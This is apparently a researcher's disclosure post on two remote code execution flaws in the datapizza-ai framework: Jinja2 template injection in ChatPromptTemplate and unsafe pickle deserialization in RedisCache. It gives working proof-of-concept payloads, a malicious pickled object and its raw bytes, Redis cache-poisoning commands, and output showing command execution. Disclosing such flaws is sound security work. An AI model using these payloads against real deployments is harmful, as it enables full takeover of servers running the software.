Two Remote Code Execution (RCE) vulnerabilities were identified in datapizza-ai framework:
Template() allows Server-Side Template Injection (SSTI). If an attacker can control prompt templates, they can execute arbitrary system commands on the host.pickle.loads() on untrusted data. By poisoning the cache, an attacker can trigger arbitrary command execution when cached objects are deserialized.Source here https://github.com/datapizza-labs/datapizza-ai.
The vulnerability is caused by the usage of vulnerable functions of Jinja2 template engine (datapizza-ai-core/datapizza/modules/prompt/prompt.py, source here https://github.com/datapizza-labs/datapizza-ai/blob/v0.0.2/datapizza-ai-core/datapizza/modules/prompt/prompt.py).
from jinja2 import Template
# ...
class ChatPromptTemplate(Prompt):
# ...
def __init__(self, user_prompt_template, retrieval_prompt_template):
self.user_prompt_template = Template(user_prompt_template)
self.retrieval_prompt_template = Template(retrieval_prompt_template)
# ...
# Add user's prompt
formatted_user_prompt = self.user_prompt_template.render(
user_prompt=user_prompt
)
# ...
formatted_retrieval = self.retrieval_prompt_template.render(chunks=chunks)
# ...
To reproduce the exploit we have to install datapizza-ai:
python -m venv .env
source .env/bin/activate
pip install datapizza-ai==0.0.2
Create a python file with the following content:
import uuid
from datapizza.modules.prompt import ChatPromptTemplate
from datapizza.type import Chunk
# Create structured prompts for different tasks
system_prompt = ChatPromptTemplate(
user_prompt_template="You are helping with data analysis tasks, this is the user prompt: " \
"{{self.__init__.__globals__.__builtins__.__import__('os').popen('touch pwned1')}}",
retrieval_prompt_template="Retrieved " \
"{{self.__init__.__globals__.__builtins__.__import__('os').popen('touch pwned2')}} " \
"content:\n{% for chunk in chunks %}{{ chunk.text }}\n{% endfor %}"
)
print(
system_prompt.format(
user_prompt="Hello, how are you?",
chunks=[
Chunk(id=str(uuid.uuid4()), text="This is a chunk"),
Chunk(id=str(uuid.uuid4()), text="This is another chunk")
]
)
)
Execute the file with python3 poc.py.
Command injection result (ls -alh):
total 28K
drwxrwxr-x 3 edoardottt edoardottt 4.0K Oct 14 12:31 .
drwxrwxr-x 13 edoardottt edoardottt 4.0K Oct 14 11:51 ..
-rw-rw-r-- 1 edoardottt edoardottt 808 Oct 14 12:31 poc3-working.py
-rw-rw-r-- 1 edoardottt edoardottt 0 Oct 14 12:30 pwned1
-rw-rw-r-- 1 edoardottt edoardottt 0 Oct 14 12:30 pwned2
drwxrwxr-x 5 edoardottt edoardottt 4.0K Oct 14 11:53 .venv
Usually if attackers can control the prompt templates they can subvert the model behavior.
In this case, attackers can run arbitrary system command without any restriction (e.g. they could use a reverse shell and gain access to the server).
The impact is critical as the attacker can completely takeover the server host.
Here a simple Proof of Concept code snippet is shown, but in reality every feature that uses untrusted input in ChatPromptTemplate is vulnerable.
The vulnerability is caused by the usage of vulnerable functions of pickle serialization library (datapizza-ai-cache/redis/datapizza/cache/redis/cache.py, source here https://github.com/datapizza-labs/datapizza-ai/blob/v0.0.7/datapizza-ai-cache/redis/datapizza/cache/redis/cache.py).
import pickle
# ...
class RedisCache(Cache):
# ...
def get(self, key: str) -> str | None:
"""Retrieve and deserialize object"""
pickled_obj = self.redis.get(key)
if pickled_obj is None:
return None
return pickle.loads(pickled_obj) # type: ignore
def set(self, key: str, obj):
"""Serialize and store object"""
pickled_obj = pickle.dumps(obj)
self.redis.set(key, pickled_obj, ex=self.expiration_time)
To reproduce the exploit we have to install datapizza-ai and the Redis cache module:
python -m venv .env
source .env/bin/activate
pip install datapizza-ai==0.0.7
pip install datapizza-ai-cache-redis
Spin up a Redis server (we’re using Docker for simplicity):
docker run -d --name redis -p 6379:6379 redis:latest
For a simple proof of concept we’re using the bytes representation of pickled object below:
class Evil:
def __reduce__(self):
return (os.system, ("touch cachepwned",))
that is: \x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94..
Poison the Redis cache with this value:
127.0.0.1:6379> set poc "\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94."
OK
And run the python program below with python3 poc.py.
The following snippet just creates a new Redis cache object and tries to get the value of the key “poc” from Redis.
from datapizza.cache.redis import RedisCache
def test_redis_cache():
cache = RedisCache(host="localhost", port=6379, db=0)
cache.get("poc")
test_redis_cache()
Command injection result (ls -alh):
total 16K
-rw-rw-r-- 1 edoardottt edoardottt 0 Oct 15 18:57 cachepwned
-rw-rw-r-- 1 edoardottt edoardottt 312 Oct 15 18:51 poc-cache.py
drwxrwxr-x 5 edoardottt edoardottt 4.0K Oct 14 11:53 .venv/
Usually if attackers can control the redis cache they can subvert the model behavior, for example injecting fake LLM replies in cached queries.
In this case, attackers can run arbitrary system commands without any restriction (e.g. they could use a reverse shell and gain access to the server).
The impact is high as the attacker can completely takeover the server host.
Here a simple Proof of Concept code snippet is shown, but in reality every feature that uses RedisCache is potentially vulnerable.
I want to share a couple of thoughts:
First: how is it possible that in 2026 we still have these types of vulnerabilities?
Nowadays, any developer should know that for every language there are libraries that could lead to very bad vulnerabilities such as Jinja2 and Pickle.
Second: It was a pain in the ass communicating with the vendor.
Emails (from me and a CNA), Discord messages and GitHub private security advisories have been used and still this was the process so far:
datapizza-ai-core v0.0.3 (https://github.com/datapizza-labs/datapizza-ai/commit/31cb15234dd05e5d2f3d4a3499b050602fb1304a) without public advisory or user notification.That’s it, no further communication. We didn’t receive replies to our messages and no public advisory or user notification was issued in accordance with responsible disclosure practices.
The Unsafe Deserialization it’s still present, no response from the vendor (https://github.com/datapizza-labs/datapizza-ai/blob/f3c5508acce857f6a454ca239aea7481f97ceb69/datapizza-ai-cache/redis/datapizza/cache/redis/cache.py).
How is it possible that in 2026 companies still fail to understand how basic security practices work and doesn’t care about their product (and users) security?
At first I wanted to use a lot of memes here (Datapizza uses a lot), but honestly there’s nothing to laugh about 😕.